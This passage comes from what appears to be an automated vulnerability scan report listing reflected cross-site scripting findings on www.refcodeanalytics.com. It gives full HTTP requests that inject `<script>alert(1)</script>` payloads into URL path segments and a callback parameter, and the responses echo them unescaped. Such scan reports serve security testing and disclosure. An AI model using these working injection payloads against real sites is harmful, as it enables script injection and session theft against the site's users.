The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 873a7<script>alert(1)</script>56fef20bccc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/trackerCode.js873a7<script>alert(1)</script>56fef20bccc HTTP/1.1
Host: www.refcodeanalytics.com
Proxy-Connection: keep-alive
Referer: http://www.mastermindsolutions.ca/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 02:19:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=bb405091db0cb3407fc9749448885ed4; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
               "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
               lang="en">
   <body>
       <h1>
...[SNIP]...
<p>
           The Requested URL /js/trackerCode.js873a7<script>alert(1)</script>56fef20bccc was not found on this server.
       </p>
...[SNIP]...

2.241. http://www.refcodeanalytics.com/process/backend1.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.refcodeanalytics.com
Path:   /process/backend1.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4416<script>alert(1)</script>a994d40b830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /processe4416<script>alert(1)</script>a994d40b830/backend1.php?track=null&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1
Host: www.refcodeanalytics.com
Proxy-Connection: keep-alive
Referer: http://www.mastermindsolutions.ca/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 02:20:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c708f358db1b84d5e289fe8713fcfa03; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
               "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
               lang="en">
   <body>
       <h1>
...[SNIP]...
<p>
           The Requested URL /processe4416<script>alert(1)</script>a994d40b830/backend1.php was not found on this server.
       </p>
...[SNIP]...

2.242. http://www.refcodeanalytics.com/process/backend1.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.refcodeanalytics.com
Path:   /process/backend1.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae872<script>alert(1)</script>9148f977d0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /process/backend1.phpae872<script>alert(1)</script>9148f977d0b?track=null&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1
Host: www.refcodeanalytics.com
Proxy-Connection: keep-alive
Referer: http://www.mastermindsolutions.ca/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 02:20:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c33883d69d27487af5686d0dcd477a7e; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
               "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
               lang="en">
   <body>
       <h1>
...[SNIP]...
<p>
           The Requested URL /process/backend1.phpae872<script>alert(1)</script>9148f977d0b was not found on this server.
       </p>
...[SNIP]...

2.243. http://www.refcodeanalytics.com/process/backend1.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.refcodeanalytics.com
Path:   /process/backend1.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7000c<script>alert(1)</script>64e97b78160 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /process/backend1.php?track=null&ua=Mozilla%2F5.0%25